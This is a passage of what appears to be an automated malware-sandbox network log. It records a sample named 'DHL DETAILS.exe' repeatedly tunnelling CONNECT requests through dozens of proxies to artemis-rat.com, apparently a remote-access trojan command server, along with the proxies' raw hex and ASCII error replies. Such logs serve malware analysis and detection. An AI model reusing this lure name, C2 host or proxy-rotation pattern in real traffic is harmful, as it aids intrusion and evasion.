                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1288192.168.2.55395661.130.9.384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.263186932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1289192.168.2.55395761.130.9.384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.264024019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1290192.168.2.55396061.130.9.384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.264858007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1291192.168.2.55396261.130.9.384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.265662909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1292192.168.2.55278436.92.193.189806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.275425911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1293192.168.2.55376291.107.180.250806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.291205883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.599426031 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1294192.168.2.553997152.32.132.2204436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.294924974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1295192.168.2.553801198.12.253.117311316352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.294979095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.833422899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.536959887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.036962032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1296192.168.2.554003152.32.132.2204436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.299683094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1297192.168.2.554005152.32.132.2204436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.301089048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1298192.168.2.554006152.32.132.2204436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.302442074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1299192.168.2.553799191.102.159.15731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.305584908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.800265074 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1300192.168.2.553853172.64.207.185806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.306974888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.468655109 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1301192.168.2.55381645.196.151.12054326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.341535091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.559897900 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1302192.168.2.553859185.162.231.226806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.342324018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.497766018 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1303192.168.2.553326192.252.216.8141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.345736027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1304192.168.2.55310761.173.113.22688886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.353672981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1305192.168.2.553891104.17.239.10806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.353719950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.509867907 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1306192.168.2.553899199.188.93.21490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.362128019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1307192.168.2.5538473.212.148.19931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.363925934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.583739042 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1308192.168.2.553915185.162.228.48806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.369256020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.524985075 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1309192.168.2.55388838.54.101.25431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.369812012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.550451994 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1310192.168.2.553083128.199.187.20480006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.370110989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.720602989 CET19INHTTP/1.0 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1311192.168.2.553502123.56.1.5031296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.377934933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.038623095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1312192.168.2.553917164.92.86.113540936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.399116039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
